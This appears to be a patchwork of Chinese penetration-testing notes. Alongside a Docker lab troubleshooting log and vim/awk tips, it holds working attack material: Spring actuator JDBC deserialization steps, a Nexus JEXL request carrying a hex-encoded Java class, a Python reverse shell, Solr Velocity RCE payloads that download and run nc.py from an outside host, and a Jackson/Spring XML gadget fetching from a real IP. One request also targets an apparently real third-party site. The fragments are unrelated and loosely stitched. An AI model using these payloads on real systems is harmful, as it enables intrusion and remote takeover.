⚠️ 修改此属性会暂时导致网站所有的正常数据库服务不可用,会对业务造成影响,请谨慎操作!
mysql-connector-java 5.x 版本设置属性值为:
jdbc:mysql://your-vps-ip:3306/mysql?characterEncoding=utf8&useSSL=false&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true
mysql-connector-java 8.x 版本设置属性值为:
jdbc:mysql://your-vps-ip:3306/mysql?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true
spring 1.x
POST /env
Content-Type: application/x-www-form-urlencoded
spring.datasource.url=对应属性值
spring 2.x
POST /actuator/env
Content-Type: application/json
{"name":"spring.datasource.url","value":"对应属性值"}
spring 1.x
POST /refresh
Content-Type: application/x-www-form-urlencoded
spring 2.x
POST /actuator/refresh
Content-Type: application/json
尝试访问网站已知的数据库查询的接口,例如: /product/list ,或者寻找其他方式,主动触发源网站进行数据库查询,然后漏洞会被触发
反序列化漏洞利用完成后,使用 步骤三 的方法恢复 步骤一 中记录的 spring.datasource.url 的原始 value 值
New-Exploit-Technique-In-Java-Deserialization-Attack
需要配置 application.properties 中的 spring.datasource.url、spring.datasource.username、spring.datasource.password,保证可以正常连上 mysql 数据库,否则程序启动时就会报错退出
repository/springboot-mysql-jdbc-rce
正常访问:
http://127.0.0.1:9097/actuator/env
发送完 payload 后触发漏洞:
http://127.0.0.1:9097/product/list
最近在做靶场漏洞复现的时候发现了一个由web虚拟机和db虚拟机一起跑起来的联动靶场环境,下载完镜像后总是报错,思前想后都没办法,于是只能自己来解决问题,虽然结果令人大失所望,但是过程还是挺让人有成就感的,就记录了一下。
进入相对应的靶场环境文件夹下起靶场:
bin4xin@bin4xin's MacbookPro CVE-2020-9402 % docker-compose up -d
Creating network "cve-2020-9402_default" with the default driver
Creating cve-2020-9402_db_1 ... done
Creating cve-2020-9402_web_1 ... done
bin4xin@bin4xin's MacbookPro CVE-2020-9402 % docker-compose ps
Name Command State Ports
-------------------------------------------------------------------------------------------
cve-2020-9402_db_1 /entrypoint.sh Up 1521/tcp, 5500/tcp, 8080/tcp
cve-2020-9402_web_1 /docker-entrypoint.sh pyth ... Up 0.0.0.0:8000->8000/tcp
我们可以看到对应web服务的端口监听状态:0.0.0.0:8000->8000/tcp,所以我们直接访问试试看:
bin4xin@bin4xin's MacbookPro CVE-2020-9402 % curl localhost:8000
curl: (52) Empty reply from server
bin4xin@bin4xin's MacbookPro CVE-2020-9402 % docker-compose ps
Name Command State Ports
-------------------------------------------------------------------------------------------
cve-2020-9402_db_1 /entrypoint.sh Up 1521/tcp, 5500/tcp, 8080/tcp
cve-2020-9402_web_1 /docker-entrypoint.sh pyth ... Up 0.0.0.0:8000->8000/tcp
bin4xin@bin4xin's MacbookPro CVE-2020-9402 % curl 127.0.0.1:8000/vuln
curl: (52) Empty reply from server
bin4xin@bin4xin's MacbookPro CVE-2020-9402 % docker-compose ps
Name Command State Ports
-------------------------------------------------------------------------------------------
cve-2020-9402_db_1 /entrypoint.sh Up 1521/tcp, 5500/tcp, 8080/tcp
cve-2020-9402_web_1 /docker-entrypoint.sh pyth ... Up 0.0.0.0:8000->8000/tcp
在上面的bash终端代码我们可以看到,我们访问8000端口服务,都是返回Empty reply from server,我就很郁闷了,明明docker显示状态是Up状态,怎么访问时服务返回空呢。
还是不甘心,看了一下本地的ip地址,再次访问看看:
bin4xin@bin4xin's MacbookPro shiro % ifconfig|grep inet
inet 127.0.0.1 netmask 0xff000000
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1
inet6 fe80::aede:48ff:fe00:1122%en5 prefixlen 64 scopeid 0x7
inet6 fe80::146d:ed67:817a:e134%en0 prefixlen 64 secured scopeid 0x9
inet 114.97.221.67 netmask 0xfffffe00 broadcast 114.97.221.255
inet6 fe80::24e6:3dff:fe1c:7c55%awdl0 prefixlen 64 scopeid 0x10
inet6 fe80::24e6:3dff:fe1c:7c55%llw0 prefixlen 64 scopeid 0x11
inet6 fe80::9a9a:9906:8f8d:5e0%utun0 prefixlen 64 scopeid 0x12
inet6 fe80::8ef2:d44b:f2b0:f37e%utun1 prefixlen 64 scopeid 0x13
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
inet 114.97.221.67
bin4xin@bin4xin's MacbookPro shiro % curl http://114.97.221.67:8000/vuln
curl: (7) Failed to connect to 114.97.221.67 port 8000: Connection refused
bin4xin@bin4xin's MacbookPro shiro % docker-compose ps
Name Command State Ports
------------------------------------------------------------------------------------------------
cve-2020-9402_db_1 /entrypoint.sh Up 1521/tcp, 5500/tcp, 8080/tcp
cve-2020-9402_web_1 /docker-entrypoint.sh pyth ... Restarting
好家伙,这次直接web服务重启了,有脾气。没办法,直接把整个环境down掉重启。
这次我想到的办法是直接进容器里面去看看服务到底发生了什么:
docker ps
a66976bc6d2b cve-2020-9402_web "/docker-entrypoint.…" 4 seconds ago Up 3 seconds 0.0.0.0:8000->8000/tcp cve-2020-9402_web_1
fc99758ce428 vulhub/oracle:12c-ee "/entrypoint.sh" 5 seconds ago Up 3 seconds 1521/tcp, 5500/tcp, 8080/tcp cve-2020-9402_db_1
我们可以通过docker ps来查看docker镜像cve-2020-9402_web对应的CONTAINER ID,通过这个id值进入容器;
bin4xin@bin4xin's MacbookPro CVE-2020-9402 % sudo docker exec -it a66976bc6d2b /bin/bash
root@a66976bc6d2b:/usr/src#
root@a66976bc6d2b:/usr/src# ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 06:44 ? 00:00:00 /bin/bash /docker-entrypoint.sh python manage.py runserver 0.0.0.0:8000
root 7 1 0 06:44 ? 00:00:00 bash /usr/local/bin/wait-for-it.sh -t 0 db:1521 -- echo oracle is up
root 56 0 0 06:45 pts/0 00:00:00 /bin/bash
root 73 7 0 06:45 ? 00:00:00 sleep 1
root 74 56 0 06:45 pts/0 00:00:00 ps -ef
看了一下,没什么大问题啊,服务该照常启动的都启动了,难道是db服务的问题?就在我疑惑的时候,果然:容器又重启了,我的shell直接掉了,查看一下状态,可不咋地,又restart了,心里苦阿。
bin4xin@bin4xin's MacbookPro CVE-2020-9402 % docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
a66976bc6d2b cve-2020-9402_web "/docker-entrypoint.…" 2 minutes ago Restarting (1) 2 seconds ago
排错之前看一下docker的打印日志指南
% docker logs --help
Usage: docker logs [OPTIONS] CONTAINER
Fetch the logs of a container
Options:
--details Show extra details provided to logs
-f, --follow Follow log output
--since string Show logs since timestamp (e.g. 2013-01-02T13:23:37) or relative (e.g. 42m for 42 minutes)
--tail string Number of lines to show from the end of the logs (default "all")
-t, --timestamps Show timestamps
--until string Show logs before a timestamp (e.g. 2013-01-02T13:23:37) or relative (e.g. 42m for 42 minutes)
我们可以看到,f参数对应的是log查看的容器id,而我的需求是,对应查看某一个时间段之后的db虚拟机的日志,所以生成命令:docker logs --since 2020-09-11T14:50:00 -f b5731d06d3ea
web的日志:
bin4xin@bin4xin's MacbookPro shiro % docker logs --since 2020-09-11T14:40:00 -f ae715c332e7e
+ cd /usr/src
+ wait-for-it.sh -t 0 db:1521 -- echo 'oracle is up'
wait-for-it.sh: waiting for db:1521 without a timeout
wait-for-it.sh: db:1521 is available after 60 seconds
oracle is up
我们可以看到没有任何报错;继续,看下面的报错:
+ python manage.py makemigrations
Traceback (most recent call last):
File "/usr/local/lib/python3.6/site-packages/django/db/backends/base/base.py", line 220, in ensure_connection
self.connect()
File "/usr/local/lib/python3.6/site-packages/django/utils/asyncio.py", line 26, in inner
return func(*args, **kwargs)
File "/usr/local/lib/python3.6/site-packages/django/db/backends/base/base.py", line 197, in connect
self.connection = self.get_new_connection(conn_params)
File "/usr/local/lib/python3.6/site-packages/django/utils/asyncio.py", line 26, in inner
return func(*args, **kwargs)
File "/usr/local/lib/python3.6/site-packages/django/db/backends/oracle/base.py", line 232, in get_new_connection
**conn_params,
cx_Oracle.DatabaseError: ORA-12505: TNS:listener does not currently know of SID given in connect descriptor
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
File "manage.py", line 21, in <module>
main()
·中间部分省略
·中间部分省略
·中间部分省略
**conn_params,
django.db.utils.DatabaseError: ORA-12505: TNS:listener does not currently know of SID given in connect descriptor
查看报错是db的报错,赶紧看看db虚拟机的日志情况docker logs --since 2020-09-11T14:40:00 -f b32b16e34b6c
db:
ls: cannot access /u01/app/oracle/oradata/orcl: No such file or directory
No databases found in /u01/app/oracle/oradata/orcl. About to create a new database instance
Starting database listener
LSNRCTL for Linux: Version 12.1.0.2.0 - Production on 11-SEP-2020 06:54:05
Copyright (c) 1991, 2014, Oracle. All rights reserved.
Starting /u01/app/oracle/product/12.1.0.2/dbhome_1/bin/tnslsnr: please wait...
TNSLSNR for Linux: Version 12.1.0.2.0 - Production
System parameter file is /u01/app/oracle/product/12.1.0.2/dbhome_1/network/admin/listener.ora
Log messages written to /u01/app/oracle/diag/tnslsnr/b32b16e34b6c/listener/alert/log.xml
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=b32b16e34b6c)(PORT=1521)))
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=b32b16e34b6c)(PORT=1521)))
STATUS of the LISTENER
------------------------
Alias LISTENER
Version TNSLSNR for Linux: Version 12.1.0.2.0 - Production
Start Date 11-SEP-2020 06:54:05
Uptime 0 days 0 hr. 0 min. 0 sec
Trace Level off
Security ON: Local OS Authentication
SNMP OFF
Listener Parameter File /u01/app/oracle/product/12.1.0.2/dbhome_1/network/admin/listener.ora
Listener Log File /u01/app/oracle/diag/tnslsnr/b32b16e34b6c/listener/alert/log.xml
Listening Endpoints Summary...
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=b32b16e34b6c)(PORT=1521)))
The listener supports no services
The command completed successfully
Copying database files
1% complete
3% complete
11% complete
18% complete
数据库服务似乎已经启动起来了,但是数据库文件还在复制过程中:Copying database files,那就等待文件复制完成试试看是不是复制文件的行为。
100% complete
Look at the log file "/u01/app/oracle/cfgtoollogs/dbca/orcl/orcl.log" for further details.
LSNRCTL for Linux: Version 12.1.0.2.0 - Production on 11-SEP-2020 07:00:33
Copyright (c) 1991, 2014, Oracle. All rights reserved.
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=b32b16e34b6c)(PORT=1521)))
The command completed successfully
Database has been created in /u01/app/oracle/oradata/orcl
SYS and SYSTEM passwords are set to [oracle]
Setting HTTP port to 8080
PL/SQL procedure successfully completed.
Please login to http://<ip_address>:8080/em to use enterprise manager
User: sys; Password oracle; Sysdba: true
Fixing permissions...
Running init scripts...
Init scripts in /oracle.init.d/: Ignoring /oracle.init.d/*
Done with scripts we are ready to go
难道是因为db的原因导致web服务报错,而且恰好报错是oracle数据库的错,而又恰好我们看日志时是存在这样的情况的。返回去在看web虚拟机的日志,果然:db虚拟机数据库文件拷贝完成后,这边web虚拟机重启后启动服务就没有报错了,服务跑在8000端口。
+ cd /usr/src
+ wait-for-it.sh -t 0 db:1521 -- echo 'oracle is up'
wait-for-it.sh: waiting for db:1521 without a timeout
wait-for-it.sh: db:1521 is available after 0 seconds
oracle is up
+ python manage.py makemigrations
Migrations for 'vuln':
vuln/migrations/0001_initial.py
- Create model Names
- Create model Collection
- Create model Collection2
+ python manage.py migrate
Operations to perform:
Apply all migrations: admin, auth, contenttypes, sessions, vuln
Running migrations:
Applying contenttypes.0001_initial... OK
Applying auth.0001_initial... OK
Applying admin.0001_initial... OK
Applying admin.0002_logentry_remove_auto_add... OK
Applying admin.0003_logentry_add_action_flag_choices... OK
Applying contenttypes.0002_remove_content_type_name... OK
Applying auth.0002_alter_permission_name_max_length... OK
Applying auth.0003_alter_user_email_max_length... OK
Applying auth.0004_alter_user_username_opts... OK
Applying auth.0005_alter_user_last_login_null... OK
Applying auth.0006_require_contenttypes_0002... OK
Applying auth.0007_alter_validators_add_error_messages... OK
Applying auth.0008_alter_user_username_max_length... OK
Applying auth.0009_alter_user_last_name_max_length... OK
Applying auth.0010_alter_group_name_max_length... OK
Applying auth.0011_update_proxy_permissions... OK
Applying sessions.0001_initial... OK
Applying vuln.0001_initial... OK
+ python manage.py loaddata collection.json
Installed 8 object(s) from 1 fixture(s)
+ python manage.py shell -c 'from django.contrib.auth.models import User; User.objects.create_superuser('\''admin'\'', '\''admin@vulhub.org'\'', '\''admin'\'') if not User.objects.filter(username='\''admin'\'').exists() else 0'
+ exec python manage.py runserver 0.0.0.0:8000
exec python manage.py runserver 0.0.0.0:8000看到这个日志打印出来,觉得好像确实没有什么问题了,再来查看一下docker的状态。
bin4xin@bin4xin's MacbookPro CVE-2020-9402 % docker-compose ps
Name Command State Ports
-------------------------------------------------------------------------------------------
cve-2020-9402_db_1 /entrypoint.sh Up 1521/tcp, 5500/tcp, 8080/tcp
cve-2020-9402_web_1 /docker-entrypoint.sh pyth ... Up 0.0.0.0:8000->8000/tcp
看一眼docker的情况,都是up状态。访问一下8000端口终于也可以访问到web服务了,不再是Empty reply from server了。
bin4xin@bin4xin's MacbookPro CVE-2020-9402 % curl localhost:8000
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at /</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; color:#000; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
web访问日志:
Watching for file changes with StatReloader
Not Found: /
[11/Sep/2020 07:01:23] "GET / HTTP/1.1" 404 2137
Not Found: /
[11/Sep/2020 07:06:47] "GET / HTTP/1.1" 404 2141
---
Parameter: q (GET)
Type: boolean-based blind
Title: Oracle boolean-based blind - Parameter replace
Payload: q=(SELECT (CASE WHEN (6457=6457) THEN 6457 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
Type: time-based blind
Title: Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)
Payload: q=(SELECT (CASE WHEN (6135=6135) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(74)||CHR(88)||CHR(115),5) ELSE 6135 END) FROM DUAL)
---
[15:22:11] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
在当前文件夹下查找包含”get_spg2lsf”字符串的文件
1、删除每行前10个字符:
其中,%表示所有行,s表示替换,”%s”可用”1,$”代替(下同);
正则表达式”/^.{10}//”中,^表示行首;”.”表示要删除的字符个数,”.{10}“表示删除10个字符,可用10个”.”表示;
2、删除每行后10个字符
vi/vim 中可以使用 :s 命令来替换字符串。
:s/vivian/sky/ 替换当前行第一个 vivian 为 sky
:s/vivian/sky/g 替换当前行所有 vivian 为 sky
:n,$s/vivian/sky/ 替换第 n 行开始到最后一行中每一行的第一个 vivian 为 sky
:n,$s/vivian/sky/g 替换第 n 行开始到最后一行中每一行所有 vivian 为 sky
在实际信息搜集过程中遇到的问题:
现在有一个hosts文件,其中包含了所需要信息搜集的域名和ip地址,其格式如下存储: domain.com.cn,1.1.1.1
首先按照信息搜集的方式第一步我是先过一遍ip或域名的端口,所以问题就来了。 nmap不支持这种形式进行文件内容读取,需以一行一数据的形式,就是:
domain.com.cn1
ip1
domain.com.cn2
ip2
不管是域名还是ip地址都是以这样的形式来读取才能使用-iL参数来读取指定的域名或ip,最后实现我们的端口扫描任务,所以是需要以逗号为界限,将两列数据分成两个文件;
故我们构思一下思路:以逗号为标示,把前面一列和后面一列分别使用参数$1,$2来表示,将$1输出到domain1.txt,$2输出到domain2.txt中。
只是简单记录一下关于这个管理软件的poc代码;
POST /service/extdirect HTTP/1.1
Host: vuln_ip
sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json; charset=UTF-8
Content-Length: 7249
{"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='CAFEBABE0000003100AE0A001F00560A005700580A005700590A005A005B0A005A005C0A005D005E0A005D005F0700600A000800610A006200630700640800650A001D00660800410A001D00670A006800690A0068006A08006B08004508006C08006D0A006E006F0A006E00700A001F00710A001D00720800730A000800740800750700760A001D00770700780A0079007A08007B08007C07007D0A0023007E0A0023007F0700800100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010004746869730100114C4578706C6F69742F546573743233343B01000474657374010015284C6A6176612F6C616E672F537472696E673B29560100036F626A0100124C6A6176612F6C616E672F4F626A6563743B0100016901000149010003636D640100124C6A6176612F6C616E672F537472696E673B01000770726F636573730100134C6A6176612F6C616E672F50726F636573733B01000269730100154C6A6176612F696F2F496E70757453747265616D3B010006726573756C740100025B42010009726573756C745374720100067468726561640100124C6A6176612F6C616E672F5468726561643B0100056669656C640100194C6A6176612F6C616E672F7265666C6563742F4669656C643B01000C7468726561644C6F63616C7301000E7468726561644C6F63616C4D61700100114C6A6176612F6C616E672F436C6173733B01000A7461626C654669656C640100057461626C65010005656E74727901000A76616C75654669656C6401000E68747470436F6E6E656374696F6E01000E48747470436F6E6E656374696F6E0100076368616E6E656C01000B487474704368616E6E656C010008726573706F6E7365010008526573706F6E73650100067772697465720100154C6A6176612F696F2F5072696E745772697465723B0100164C6F63616C5661726961626C65547970655461626C650100144C6A6176612F6C616E672F436C6173733C2A3E3B01000A457863657074696F6E7307008101000A536F7572636546696C6501000C546573743233342E6A6176610C002700280700820C008300840C008500860700870C008800890C008A008B07008C0C008D00890C008E008F0100106A6176612F6C616E672F537472696E670C002700900700910C009200930100116A6176612F6C616E672F496E74656765720100106A6176612E6C616E672E5468726561640C009400950C009600970700980C0099009A0C009B009C0100246A6176612E6C616E672E5468726561644C6F63616C245468726561644C6F63616C4D617001002A6A6176612E6C616E672E5468726561644C6F63616C245468726561644C6F63616C4D617024456E74727901000576616C756507009D0C009E009F0C009B00A00C00A100A20C00A300A40100276F72672E65636C697073652E6A657474792E7365727665722E48747470436F6E6E656374696F6E0C00A500A601000E676574487474704368616E6E656C01000F6A6176612F6C616E672F436C6173730C00A700A80100106A6176612F6C616E672F4F626A6563740700A90C00AA00AB01000B676574526573706F6E73650100096765745772697465720100136A6176612F696F2F5072696E745772697465720C00AC002F0C00AD002801000F4578706C6F69742F546573743233340100136A6176612F6C616E672F457863657074696F6E0100116A6176612F6C616E672F52756E74696D6501000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0100116A6176612F6C616E672F50726F6365737301000777616974466F7201000328294901000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B0100136A6176612F696F2F496E70757453747265616D010009617661696C61626C6501000472656164010007285B4249492949010005285B4229560100106A6176612F6C616E672F54687265616401000D63757272656E7454687265616401001428294C6A6176612F6C616E672F5468726561643B010007666F724E616D65010025284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F436C6173733B0100106765744465636C617265644669656C6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F7265666C6563742F4669656C643B0100176A6176612F6C616E672F7265666C6563742F4669656C6401000D73657441636365737369626C65010004285A2956010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0100176A6176612F6C616E672F7265666C6563742F41727261790100096765744C656E677468010015284C6A6176612F6C616E672F4F626A6563743B2949010027284C6A6176612F6C616E672F4F626A6563743B49294C6A6176612F6C616E672F4F626A6563743B010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B0100076765744E616D6501001428294C6A6176612F6C616E672F537472696E673B010006657175616C73010015284C6A6176612F6C616E672F4F626A6563743B295A0100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0100186A6176612F6C616E672F7265666C6563742F4D6574686F64010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0100057772697465010005636C6F736500210026001F000000000002000100270028000100290000002F00010001000000052AB70001B100000002002A00000006000100000009002B0000000C000100000005002C002D00000009002E002F0002002900000304000400140000013EB800022AB600034C2BB60004572BB600054D2CB60006BC084E2C2D032CB60006B6000757BB0008592DB700093A04B8000A3A05120B57120CB8000D120EB6000F3A06190604B6001019061905B600113A07120B571212B8000D3A0819081213B6000F3A09190904B6001019091907B600113A0A120B571214B8000D3A0B190B1215B6000F3A0C190C04B60010013A0D03360E150E190AB80016A2003E190A150EB800173A0F190FC70006A70027190C190FB600113A0D190DC70006A70016190DB60018B60019121AB6001B990006A70009840E01A7FFBE190DB600183A0E190E121C03BD001DB6001E190D03BD001FB600203A0F190FB600183A101910122103BD001DB6001E190F03BD001FB600203A111911B600183A121912122203BD001DB6001E191103BD001FB60020C000233A1319131904B600241913B60025B100000003002A0000009600250000001600080017000D0018001200190019001A0024001B002E001D0033001F004200200048002100510023005B002500640026006A002700730029007D002A0086002B008C002D008F002F009C003100A5003200AA003300AD003500B6003600BB003700BE003900CE003A00D1002F00D7003D00DE003E00F4003F00FB004001110041011800420131004401380045013D0049002B000000DE001600A5002C00300031000F0092004500320033000E0000013E003400350000000801360036003700010012012C00380039000200190125003A003B0003002E0110003C003500040033010B003D003E0005004200FC003F00400006005100ED004100310007005B00E3004200430008006400DA004400400009007300CB00450031000A007D00C100460043000B008600B800470040000C008F00AF00480031000D00DE006000490043000E00F4004A004A0031000F00FB0043004B004300100111002D004C0031001101180026004D004300120131000D004E004F00130050000000340005005B00E3004200510008007D00C100460051000B00DE006000490051000E00FB0043004B0051001001180026004D005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'ifconfig');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"}
getshell:
下载反弹文件
invoke(null, 'wget http://vps_to_your_py:8000/nc.py');
---
cat nc.py
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("vps_ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
----
your vps terminal:
nc -lvnp 18080
Listening on 0.0.0.0 1111
invoke(null, 'python nc.py');
即可。
curl "http://192.168.137.181:8983/solr/admin/cores?indexInfo=false&wt=json"
{
"responseHeader":{
"status":0,
"QTime":0},
"initFailures":{},
"status":{
"demo":{
"name":"demo",
"instanceDir":"/var/solr/data/demo",
"dataDir":"/var/solr/data/demo/data/",
"config":"solrconfig.xml",
"schema":"managed-schema",
"startTime":"2020-08-22T01:42:03.422Z",
"uptime":51628
}
}
}
关键是这个deomo:namel;instanceDir...,修改数据包Content-Type: application/json,post数据修改内容:
POST /solr/demo/config HTTP/1.1
Host: 192.168.137.181:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 259
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
/////////////////////////////////////////////////////////////////////////////////////
反包:
HTTP/1.1 200 OK
Connection: close
Content-Type: text/plain;charset=utf-8
Content-Length: 149
{
"responseHeader":{
"status":0,
"QTime":425},
"WARNING":"This response format is experimental. It is likely to change in the future."}
rce payload:
solr/bin4xin/select?wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27pwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
getshell:
$rt.getRuntime().exec(%27curl%20-o%20/tmp/nc.py%20http://www.chihou.pro:8000/nc.py%27)
wget%20-o%20/tmp/nc.py%20http://www.chihou.pro:8000/nc.py
$rt.getRuntime().exec(%27python%20/tmp/nc.py%27)
不过一般如果存在基本认证,就需要先过认证才行。
Nmap scan report for 39.99.161.182
Host is up (0.095s latency).
PORT STATE SERVICE VERSION
8161/tcp open http Jetty 8.1.16.v20140903
|_http-server-header: Jetty(8.1.16.v20140903)
|_http-title: Apache ActiveMQ
post数据包: {“name”:”S”, “age”:21} 1 {“name”:”S”, “age”:21,”agsbdkjada__ss_d”:123} 1 这两个fastjson都不会报错,而jackson会报错,因为Jackson 因为强制key与javabean属性对齐,只能少不能多key,所以会报错。
cat jackson1.xml
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd
">
<bean id="pb" class="java.lang.ProcessBuilder">
<constructor-arg>
<array>
<value>curl</value>
<value>http://47.52.233.92:8000/pc.py</value>
</array>
</constructor-arg>
<property name="any" value="#{ pb.start() }"/>
</bean>
</beans>
----------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
POST /exploit HTTP/1.1
Host: 192.168.43.14:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Upgrade-Insecure-Requests: 1
Content-Length: 142
{
"param": [
"org.springframework.context.support.FileSystemXmlApplicationContext",
"http://47.52.233.92:8000/jackson1.xml"
]
}
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
223.246.173.228 - - [31/Aug/2020 16:05:12] "GET /jackson1.xml HTTP/1.1" 200 -
223.246.173.228 - - [31/Aug/2020 16:05:12] "GET /jackson1.xml HTTP/1.1" 200 -
223.246.173.228 - - [31/Aug/2020 16:05:12] code 404, message File not found
223.246.173.228 - - [31/Aug/2020 16:05:12] "GET /pc.py HTTP/1.1" 404 -
POST /jubaopen/api2/wealth/mail/getCheckCode HTTP/1.1
Host: dev.pactera.com
Content-Length: 24
DNT: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.58
Content-Type: application/json;charset=UTF-8
Accept: application/json, text/plain, */*
timeStamp: 1597418145214
userId: undefined
token: undefined
deviceType: 2
Origin: http://dev.pactera.com
Referer: http://dev.pactera.com/jubaopen/weixin2/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
{"name":"S", "age":21}
HTTP/1.1 200
Server: nginx/1.16.1
Date: Fri, 14 Aug 2020 15:21:32 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: POST,GET,PUT,OPTIONS,DELETE,PATCH
Access-Control-Max-Age: 3600
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Content-Length: 19469
